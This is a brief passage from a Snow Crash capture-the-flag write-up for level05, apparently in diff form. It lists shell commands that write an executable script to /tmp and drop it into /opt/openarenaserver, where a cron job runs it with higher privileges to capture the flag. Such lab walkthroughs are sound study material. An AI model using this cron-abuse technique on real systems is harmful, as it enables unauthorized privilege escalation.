Cpaluszek/snow_crash/levels/level05/level05.md

 - `echo '#!/bin/bash' > /tmp/exploit.sh`
 - `echo 'getflag > /tmp/flag' >> /tmp/exploit.sh`
 - `chmod +x /tmp/exploit.sh`
+then move it to /opt/openarenaserver, where the script execute the files

 ## Retrieval of Flag
 After two minutes, we check the `/tmp` directory and examine the contents of the newly created `flag` file, which contains the output of the `getflag` command executed by the script triggered by the cron job, that is the flag we need !